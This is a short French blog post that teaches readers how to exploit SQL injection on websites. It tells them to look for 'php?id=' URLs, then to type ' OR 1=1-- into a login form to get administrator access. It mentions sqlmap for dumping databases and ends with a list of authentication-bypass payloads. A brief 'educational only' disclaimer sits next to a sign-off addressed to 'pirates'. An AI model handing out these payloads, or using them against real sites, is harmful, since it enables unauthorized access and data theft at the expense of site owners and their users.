Comment exploiter facilement une injection SQL
- Root 404
- 3 août 2022
- 1 min de lecture
Dernière mise à jour : 7 août 2022
Tout d'abord c'est quoi une injection SQL ?
L'injection SQL est un type attaque où les pirates insèrent leur propre code dans un site Web pour contourner ses mesures de sécurité.
Les conséquences d'une faille SQL peuvent être diverses, du contournement de formulaires d'authentification afin d'être admin à l'extraction complète de la base de données, etc...
Passons au choses sérieuses !
Prenons un exemple d'url :
La faille Sql se présente dans certains cas comme suit.
après le "/" si vous apercevez php?id= c'est que potentiellement la faille n'a pas été corrigée. Vous pouvez alors tenter ce qui va suivre.
Dirigez vous dans la section " login " du site comme si vous souhaitiez vous connecter.
Ensuite, vous allez entrer dans le premier champ ( l'username ) ' OR 1=1-- et dans le password. Soit vous copiez collez la même chose, soit vous écrivez ce que vous voulez comme " toto ".
Faites entrée et vous voilà connecté en tant qu'administrateur du site !
C'est aussi simple que cela.
Bien entendu, il existe plein de méthodes d'intrusion mais celle ci est la plus simple à mon sens.
Vous avez des outils sur Kali linux afin de dump la base de données du site comme sqlmap.
Sinon voici une liste similaire à l'injection précédente ci-dessus :
'='
'OR 1=1--
'OR 1=1
'OR a=a
'OR'
'OR''='
'OR"="
'OR'="
'OR '="
'OR "='
'OR ''='
'OR '=''
'OR "=''
'OR ''="
'OR 1=1;#
Je ne serai bien entendu pas tenu responsable de ce que vous ferez avec ce genre de test d'intrusion.
Cela reste un usage à but éducatif uniquement.
Voilà les pirates !
Comments